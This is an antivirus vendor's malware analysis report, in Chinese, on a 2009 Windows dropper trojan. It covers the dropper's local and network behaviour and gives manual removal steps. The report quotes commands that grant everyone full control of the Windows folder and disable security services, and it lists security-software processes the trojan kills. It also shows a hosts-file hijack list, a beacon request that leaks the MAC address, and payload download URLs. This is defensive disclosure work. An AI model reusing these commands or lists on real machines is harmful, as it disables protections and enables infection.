网络信息安全是一个博大精深的技术体系,安天将自己的注意力专注于主要矛盾,即计算机网络病毒问题。
    根据有关机构统计,全球超过80%的安全事件均与病毒有关,网络病毒是信息社会面临的主要安全挑战之一,因此,安天人将“天下无毒”作为自己追求的安全境界。
    安天将网络安全工作者的宏观视野与反病毒工程师的成熟细腻有机结合。将反病毒技术与网络监控技术、计算机犯罪取证技术、安全评估技术等进行了有机的结合,形成了自身的产品内涵。
  当前位置:首页 - 安全响应中心 -> 病毒分析报告

Trojan/Win32.Mudrop.aui[Dropper]分析
出处:安天实验室 时间:2009年7月1日
 

  • 病毒标签
 

病毒名称: Trojan/Win32.Mudrop.aui[Dropper]
病毒类型: 木马
文件 MD5: 6CF94B87CBEABFA0CEC421F3E4827823
公开范围: 完全公开
危害等级: 4
文件长度: 13,840 字节
感染系统: Windows98以上版本
开发工具: Microsoft Visual C++ 6.0
加壳类型: NsPacK V3.7

  • 病毒描述
 

    该恶意代码文件为木马类,病毒运行后动获取大量API函数,创建病毒互斥量"907ERT"防止病毒多次运行产生冲突,遍历%System32%目录下是否存在"explorer.exe"文件,调用CMD命令将%Windir%、%Temp%目录给予当前用户完全控制权限,停止ekrn、AVP安全软件服务、结束大量安全软件进程,衍生病毒DLL文件到%System32%目录下,使用rundll32.exe启动病毒DLL文件,衍生病毒DLL到%Windir%目录下,动态获取病毒DLL的"FF"模块,进入该模块内后病毒判断自身进程是否在"explorer.exe"进程中,如是则创建hosts文件、劫持大量域名地址,调用API函数,查找含有windows 文件保护、找到恢复文件对话框的窗口,找到后将其窗口隐藏,在每个磁盘根目录下创建autorun.inf文件,添加注册表病毒服务创建病毒驱动文件,通过ipconfig all命令获取本机MAC地址连接网络发送安装统一信息,并下载大量病毒文件到本地。

  • 行为分析-本地行为
 

1、病毒运行后动获取大量API函数,创建病毒互斥量"907ERT"防止病毒多次运行产生冲突,遍历%System32%目录下是否存在"explorer.exe"文件,调用CMD命令:"cmd /c cacls C:\WINDOWS /e /p everyone:f"将%Windir%、%Temp%目录给予当前用户完全控制权限,使用:"cmd /c sc config ekrn start= disabled"、cmd /c sc config avp start= disabled停止ekrn、AVP安全软件服务。

2、动态获取病毒DLL的"FF"模块,进入该模块内后病毒判断自身进程是否在"explorer.exe"进程中,如是则创建hosts文件、劫持大量域名地址,调用API函数,查找含有windows 文件保护、找到恢复文件对话框的窗口,找到后将其窗口隐藏,在每个磁盘根目录下创建autorun.inf文件,通过ipconfig all命令获取本机MAC地址连接网络发送安装统一信息,被劫持的hosts域名列表:
127.0.0.1 v.onondown.com.cn
127.0.0.2 ymsdasdw1.cn
127.0.0.3 h96b.info
127.0.0.0 fuck.zttwp.cn
127.0.0.0 www.hackerbf.cn
127.0.0.0 geekbyfeng.cn
127.0.0.0 121.14.101.68
127.0.0.0 ppp.etimes888.com
127.0.0.0 www.bypk.com
127.0.0.0 CSC3-2004-crl.verisign.com
127.0.0.1 va9sdhun23.cn
127.0.0.0 udp.hjob123.com
127.0.0.2 bnasnd83nd.cn
127.0.0.0 www.gamehacker.com.cn
127.0.0.0 gamehacker.com.cn
127.0.0.3 adlaji.cn
127.0.0.1 858656.com
127.1.1.1 bnasnd83nd.cn
127.0.0.1 my123.com
127.0.0.0 user1.12-27.net
127.0.0.1 8749.com
127.0.0.0 fengent.cn
127.0.0.1 4199.com
127.0.0.1 user1.16-22.net
127.0.0.1 7379.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
127.0.0.1 7255.com
127.0.0.1 user1.23-12.net
127.0.0.1 3448.com
127.0.0.1 www.guccia.net
127.0.0.1 7939.com
127.0.0.1 a.o1o1o1.nEt
127.0.0.1 8009.com
127.0.0.1 user1.12-73.cn
127.0.0.1 piaoxue.com
127.0.0.1 3n8nlasd.cn
127.0.0.1 kzdh.com
127.0.0.0 www.sony888.cn
127.0.0.1 about.blank.la
127.0.0.0 user1.asp-33.cn
127.0.0.1 6781.com
127.0.0.0 www.netkwek.cn
127.0.0.1 7322.com
127.0.0.0 ymsdkad6.cn
127.0.0.1 localhost
127.0.0.0 www.lkwueir.cn
127.0.0.1 06.jacai.com
127.0.1.1 user1.23-17.net
127.0.0.1 1.jopenkk.com
127.0.0.0 upa.luzhiai.net
127.0.0.1 1.jopenqc.com
127.0.0.0 www.guccia.net
127.0.0.1 1.joppnqq.com
127.0.0.0 4m9mnlmi.cn
127.0.0.1 1.xqhgm.com
127.0.0.0 mm119mkssd.cn
127.0.0.1 100.332233.com
127.0.0.0 61.128.171.115:8080
127.0.0.1 121.11.90.79
127.0.0.0 www.1119111.com
127.0.0.1 121565.net
127.0.0.0 win.nihao69.cn
127.0.0.1 125.90.88.38
127.0.0.1 16888.6to23.com
127.0.0.1 2.joppnqq.com
127.0.0.0 puc.lianxiac.net
127.0.0.1 204.177.92.68
127.0.0.0 pud.lianxiac.net
127.0.0.1 210.74.145.236
127.0.0.0 210.76.0.133
127.0.0.1 219.129.239.220
127.0.0.0 61.166.32.2
127.0.0.1 219.153.40.221
127.0.0.0 218.92.186.27
127.0.0.1 219.153.46.27
127.0.0.0 www.fsfsfag.cn
127.0.0.1 219.153.52.123
127.0.0.0 ovo.ovovov.cn
127.0.0.1 221.195.42.71
127.0.0.0 dw.com.com
127.0.0.1 222.73.218.115
127.0.0.1 203.110.168.233:80
127.0.0.1 3.joppnqq.com
127.0.0.1 203.110.168.221:80
127.0.0.1 363xx.com
127.0.0.1 www1.ip10086.com.cm
127.0.0.1 4199.com
127.0.0.1 blog.ip10086.com.cn
127.0.0.1 43242.com
127.0.0.1 www.ccji68.cn
127.0.0.1 5.xqhgm.com
127.0.0.0 t.myblank.cn
127.0.0.1 520.mm5208.com
127.0.0.0 x.myblank.cn
127.0.0.1 59.34.131.54
127.0.0.1 210.51.45.5
127.0.0.1 59.34.198.228
127.0.0.1 www.ew1q.cn
127.0.0.1 59.34.198.88
127.0.0.1 59.34.198.97
127.0.0.1 60.190.114.101
127.0.0.1 60.190.218.34
127.0.0.0 qq-xing.com.cn
127.0.0.1 60.191.124.252
127.0.0.1 61.145.117.212
127.0.0.1 61.157.109.222
127.0.0.1 75.126.3.216
127.0.0.1 75.126.3.217
127.0.0.1 75.126.3.218
127.0.0.0 59.125.231.177:17777
127.0.0.1 75.126.3.220
127.0.0.1 75.126.3.221
127.0.0.1 75.126.3.222
127.0.0.1 772630.com
127.0.0.1 832823.cn
127.0.0.1 8749.com
127.0.0.1 888.jopenqc.com
127.0.0.1 89382.cn
127.0.0.1 8v8.biz
127.0.0.1 97725.com
127.0.0.1 9gg.biz
127.0.0.1 www.9000music.com
127.0.0.1 test.591jx.com
127.0.0.1 a.topxxxx.cn
127.0.0.1 picon.chinaren.com
127.0.0.1 www.5566.net
127.0.0.1 p.qqkx.com
127.0.0.1 news.netandtv.com
127.0.0.1 z.neter888.cn
127.0.0.1 b.myblank.cn
127.0.0.1 wvw.wokutu.com
127.0.0.1 unionch.qyule.com
127.0.0.1 www.qyule.com
127.0.0.1 it.itjc.cn
127.0.0.1 www.linkwww.com
127.0.0.1 vod.kaicn.com
127.0.0.1 www.tx8688.com
127.0.0.1 b.neter888.cn
127.0.0.1 promote.huanqiu.com
127.0.0.1 www.huanqiu.com
127.0.0.1 www.haokanla.com
127.0.0.1 play.unionsky.cn
127.0.0.1 www.52v.com
127.0.0.1 www.gghka.cn
127.0.0.1 icon.ajiang.net
127.0.0.1 new.ete.cn
127.0.0.1 www.stiae.cn
127.0.0.1 o.neter888.cn
127.0.0.1 comm.jinti.com
127.0.0.1 www.google-analytics.com
127.0.0.1 hz.mmstat.com
127.0.0.1 www.game175.cn
127.0.0.1 x.neter888.cn
127.0.0.1 z.neter888.cn
127.0.0.1 p.etimes888.com
127.0.0.1 hx.etimes888.com
127.0.0.1 abc.qqkx.com
127.0.0.1 dm.popdm.cn
127.0.0.1 www.yl9999.com
127.0.0.1 www.dajiadoushe.cn
127.0.0.1 v.onondown.com.cn
127.0.0.1 www.interoo.net
127.0.0.1 bally1.bally-bally.net
127.0.0.1 www.bao5605509.cn
127.0.0.1 www.rty456.cn
127.0.0.1 www.werqwer.cn
127.0.0.1 1.360-1.cn
127.0.0.1 user1.23-16.net
127.0.0.1 www.guccia.net
127.0.0.1 www.interoo.net
127.0.0.1 upa.netsool.net
127.0.0.1 js.users.51.la
127.0.0.1 vip2.51.la
127.0.0.1 web.51.la
127.0.0.1 qq.gong2008.com
127.0.0.1 2008tl.copyip.com
127.0.0.1 tla.laozihuolaile.cn
127.0.0.1 www.tx6868.cn
127.0.0.1 p001.tiloaiai.com
127.0.0.1 s1.tl8tl.com
127.0.0.1 s1.gong2008.com
127.0.0.1 4b3ce56f9g.3f6e2cc5f0b.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com

3、监视以下进程发现后将其进程强行关闭:
rsmain.exe、scanfrm.exe、rsnetsvr.exe、rssafety.exe、avp.exe、safeboxtray.exe、360safe.exe、360safebox.exe、360tray.exe、antiarp.exe、ekrn.exe、egui.exe、ravmon.exe、ravmond.exe、ravtask.exe、ccenter.exe、ravstub.exe、ravstub.exe、rstray.exe、rstray.exe、rav.exe、rav.exe、rsaupd.exe、rsaupd.exe、agentsvr.exe、agentsvr.exe、qqdoctor.exe、drrtp.exe、mcproxy.exe、mcnasvc.exe、mcshield.exe、mpfsrv.exe、pccguide.exe、zonealarm.exe、zonealarm.exe、wink.exe、windows优化大师.exe、wfindv32.exe、webtrap.exe、webscanx.exe、webscan.exe、vsstat.exe、vshwin32.exe、vshwin32.exe、vsecomr.exe、vpc32.exe、vir.exe、vettray.exe、vet95.exe、vavrunr.exe、ulibcfg.exe、tsc.exe、tmupdito.exe、tmproxy.exe、tmoagent.exe、tmntsrv.exe、tds2-ntexe、tds298.exe、tca.exe、tbscan.exe、sweep95.exe、spy.exe、sphinx.exe、smtpsvc.exe、smc.exe、sirc32.exe、serv95.exe、secu.exe、scrscan.exe、scon.exe、scanpm.exe、scan32.exe、scan.exe、safeweb.exe、scam32.exe、rfw.exe、rfwmain.exe、rfwsrv.exe、rfwstub.exe、rfwproxy.exe、rescue32.exe、rav7win.exe、rav7.exe、ras.exe、pview95.exe、prot.exe、program.exe、ppppwallrun.exe、pop3trap.exe、persfw.exe、pcfwallicon.exe、pccwin98.exe、pccmain.exe、pcciomon.exe、pccclient.exe、navwnt.exe、navw32.exe、navw.exe、navsched.exe、navrunr.exe、navnt.exe、navlu32.exe、navapw32.exe、navapsvc.exe、n32acan.exe、moolive.exe、moniker.exe、mon.exe、mcafee.exe、lucomserver.exe、luall.exe、kwatch.exe、kvprescan.exe、kvmonxp.exe、krf.exe、kppmain.exe、kpfwsvc.exe、kpfw32.exe、kpfw32.exe、kissvc.exe、kavstart.exe、kav32.exe、kasmain.exe、kabackreport.exe、jed.exe、cfinet32.exe、cfinet.exe、cfind.exe、cfiaudit.exe、avwin95.exe、avsynmgr.exe、avsched32.exe、avpupd.exe、avkserv.exe、autodown.exe、antivir.exe、anti-trojan.exe、dvp95exe、dv95o.exe、dv95.exe、kaccore.exe、kmailmon.exe、nod32krn.exe、efcv.exe、avp.exe

4、病毒运行后衍生以下文件到系统目录下
%System32%\drivers\etc\hosts
%System32%\drivers\OLD3.tmp
%System32%\drivers\pcidump.sys
%System32%\drivers\acpiec.sys
%System32%\dllcache\acpiec.sys
%System32%\func.dll
%Windir%\LastGood\system32\drivers\acpiec.sys
%Windir%\phpi.dll

5、添加病毒注册表服务启动项
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\DisplayName
值: 字符串: "pcidump"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\ImagePath
值: 字符串: "System32\DRIVERS\pcidump.sys."
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\Start
值: DWORD: 3 (0x3)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\Type
值: DWORD: 1 (0x1)

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UPDATEDATA\DisplayName
值: 字符串: "UPDATEDATA"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UPDATEDATA\ImagePath
值: 字符串: "\??\C:\WINDOWS\system32\drivers\acpiec.sys."
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UPDATEDATA\Start
值: DWORD: 3 (0x3)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UPDATEDATA\Type
值: DWORD: 1 (0x1)

  • 行为分析-网络行为
 

GET /360/aa1dfh.txt?mac=00-0C-29-8C-9D-B6&ver=v1-300&key=146&os=windows HTTP/1.1
User-Agent: INet
Host: babi2009.com
Cache-Control: no-cache
描述:向该域名提交安装统计信息,并按以下列表下载大量恶意病毒文件
HTTP/1.1 200 OK
Content-Length: 1320
Content-Type: text/plain
Last-Modified: Thu, 25 Jun 2009 06:48:33 GMT
Accept-Ranges: bytes
ETag: "cee827f560f5c91:2c0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 30 Jun 2009 07:12:10 GMT

2:http://havvvha***.com/xiao/aa1.exe
2:http://havvvha***.com/xiao/aa2.exe
2:http://havvvha***.com/xiao/aa3.exe
2:http://havvvha***.com/xiao/aa4.exe
1:http://havvvha***.com/xiao/aa5.exe
2:http://havvvha***.com/xiao/aa6.exe
2:http://havvvha***.com/xiao/aa7.exe
2:http://havvvha***.com/xiao/aa8.exe
2:http://havvvha***.com/xiao/aa9.exe
2:http://havvvha***.com/xiao/aa10.exe
2:http://havvvha***.com/xiao/aa11.exe
2:http://havvvha***.com/xiao/aa12.exe
2:http://havvvha***.com/xiao/aa13.exe
2:http://havvvha***.com/xiao/aa14.exe
2:http://havvvha***.com/xiao/aa15.exe
2:http://havvvha***.com/xiao/aa16.exe
2:http://havvvha***.com/xiao/aa17.exe
2:http://havvvha***.com/xiao/aa18.exe
2:http://havvvha***.com/xiao/aa19.exe
2:http://havvvha***.com/xiao/aa20.exe
2:http://havvvha***.com/xiao/aa21.exe
2:http://havvvha***.com/xiao/aa22.exe
2:http://havvvha***.com/xiao/aa23.exe
2:http://havvvha***.com/xiao/aa24.exe
2:http://havvvha***.com/xiao/aa25.exe
2:http://havvvha***.com/xiao/aa26.exe
2:http://havvvha***.com/xiao/aa27.exe
2:http://havvvha***.com/xiao/aa28.exe
2:http://havvvha***.com/xiao/aa29.exe
2:http://havvvha***.com/xiao/aa30.exe
2:http://havvvha***.com/xiao/aa31.exe
2:http://havvvha***.com/xiao/aa32.exe
2:http://havvvha***.com/xiao/aa33.exe
2:http://havvvha***.com/xiao/aa34.exe
2:http://havvvha***.com/xiao/aa35.exe
2:http://havvvha***.com/xiao/aa36.exe
2:http://havvvha***.com/xiao/1.exe

注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
        %Windir%             WINDODWS所在目录
        %DriveLetter%          逻辑驱动器根目录
        %ProgramFiles%          系统程序默认安装目录
        %HomeDrive%           当前启动的系统的所在分区
        %Documents and Settings%    当前用户文档根目录
        %Temp%             \Documents and Settings\当前用户\Local Settings\Temp
        %System32%           系统的 System32文件夹
    
        Windows2000/NT中默认的安装路径是C:\Winnt\System32
        windows95/98/me中默认的安装路径是C:\Windows\System
        windowsXP中默认的安装路径是C:\Windows\System32

  • 清除方案
 

1、使用安天防线可彻底清除此病毒(推荐),请点击下载(http://www.antiyfx.com)
2、手工清除请按照行为分析删除对应文件,恢复相关系统设置。
推荐使用ATool管理工具,请点击下载(http://www.antiy.com/cn/download/index.htm)
(1) 使用ATOOL“进程管理”关闭病毒相关进程,结束rundll32.exe

(2)删除病毒连接网络下载的大量病毒衍生的文件 (注:病毒下载的列表内容会随时更换,所以衍生的文件也有可能变化)
%System32%\drivers\etc\hosts
%System32%\drivers\OLD3.tmp
%System32%\drivers\pcidump.sys
%System32%\drivers\acpiec.sys
%System32%\dllcache\acpiec.sys
%System32%\func.dll
%Windir%\LastGood\system32\drivers\acpiec.sys
%Windir%\phpi.dll

(3)删除病毒添加的注册表服务
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump
删除Services 键值下的pcidump主键值

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UPDATEDATA
删除UPDATEDATA 键值下的pcidump主键值